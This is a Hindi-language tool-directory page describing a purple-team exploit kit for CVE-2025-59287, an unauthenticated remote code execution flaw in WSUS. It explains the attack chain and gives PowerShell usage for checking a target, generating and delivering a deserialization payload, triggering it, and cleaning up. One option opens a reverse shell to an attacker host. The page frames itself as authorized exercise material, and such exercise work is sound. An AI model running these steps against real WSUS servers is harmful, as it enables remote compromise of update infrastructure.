Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59287-Exercise-Use — बैंगनी टीम अभ्यास स्क्रिप्ट जो CVE-2025-59287 का प्रदर्शन करती हैं, जो WSUS डेटाबेस में दुर्भावनापूर्ण deserialization पेलोड इंजेक्शन के माध्यम से WSUS में एक अनप्रमाणित RCE है। | Kitploit
उपकरण/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

बैंगनी टीम अभ्यास स्क्रिप्ट जो CVE-2025-59287 का प्रदर्शन करती हैं, जो WSUS डेटाबेस में दुर्भावनापूर्ण deserialization पेलोड इंजेक्शन के माध्यम से WSUS में एक अनप्रमाणित RCE है।

रिपॉजिटरी देखें
26 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59287 — WSUS बिना प्रमाणीकरण के RCE

CVE-2025-59287 के लिए पर्पल टीम अभ्यास स्क्रिप्ट, जो Windows Server Update Services (WSUS) में बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता है।

केवल अधिकृत उपयोग। केवल नियंत्रित अभ्यास वातावरण में उन सिस्टमों के विरुद्ध उपयोग के लिए जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है।

यह कैसे काम करता है

यह भेद्यता अनाम रूप से सुलभ WSUS SOAP एंडपॉइंट्स का दुरुपयोग करके WSUS डेटाबेस में एक दुर्भावनापूर्ण deserialization पेलोड इंजेक्ट करती है। पेलोड तब निष्पादित होता है जब WSUS प्रशासनिक कंसोल खोला जाता है या सिंक ट्रिगर किया जाता है।

  1. WSUS auth सेवा किसी भी अनाम क्लाइंट को वैध टोकन जारी करती है
  2. टोकन को क्लाइंट वेब सेवा के माध्यम से रिपोर्टिंग सत्र कुकी के लिए विनिमय किया जाता है
  3. दुर्भावनापूर्ण serialized ऑब्जेक्ट को रिपोर्टिंग सेवा के माध्यम से WSUS डेटाबेस में इंजेक्ट किया जाता है
  4. पेलोड तब निष्पादित होता है जब WSUS कंसोल लोड होता है या सिंक ईवेंट सक्रिय होता है

आवश्यकताएँ

  • PowerShell 5.1+ वाला विंडोज़ अटैक बॉक्स
  • पोर्ट 8530 पर WSUS तक नेटवर्क पहुंच
  • ysoserial\Release\ फ़ोल्डर में ysoserial.net रखा गया हो (सेटअप देखें)

रिपॉजिटरी संरचना

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Verify target is vulnerable
├── 2-generate.ps1    # Generate serialized payload blob
├── 3-deliver.ps1     # Deliver payload to WSUS server
├── 4-verify.ps1      # Verify execution and clean up
├── ysoserial/        # Place ysoserial.net release here (not committed)
│   └── Release/
│       └── ysoserial.exe
└── README.md

सेटअप

रिपॉजिटरी को क्लोन करें या डाउनलोड करें। ysoserial.net को इस प्रकार जोड़ें कि पथ ysoserial\Release\ysoserial.exe से मेल खाए।

ysoserial.net यहाँ से डाउनलोड करें: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 यह डिफ़ॉल्ट रूप से Windows Defender को ट्रिगर करेगा

उपयोग

सभी स्क्रिप्ट्स को रिपॉजिटरी रूट से चलाएँ।

1 — जाँच करें

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — जनरेट करें

फ़ाइल ड्रॉप (कोई लिसनर आवश्यक नहीं, पहले अनुशंसित):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

रिवर्स शेल:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — डिलीवर करें

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — ट्रिगर करें

WSUS सर्वर पर प्रशासनिक कंसोल को Start > Windows Server Update Services के माध्यम से खोलें, या PowerShell के माध्यम से सिंक ट्रिगर करें:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — सत्यापित करें और साफ़ करें

निष्पादन सत्यापित करें:

root@kitploit:~
.\4-verify.ps1

सभी आर्टिफैक्ट्स सत्यापित करें और साफ़ करें:

root@kitploit:~
.\4-verify.ps1 -Cleanup

अटैक बॉक्स से एडमिन शेयर के माध्यम से:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

सफाई के बाद अभ्यास कंप्यूटर को WSUS कंसोल में Computers के अंतर्गत से हटा दें।

पता लगाने के अवसर

संदर्भ

  • CVE-2025-59287 — मूल शोध: hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
टूल डाउनलोड करें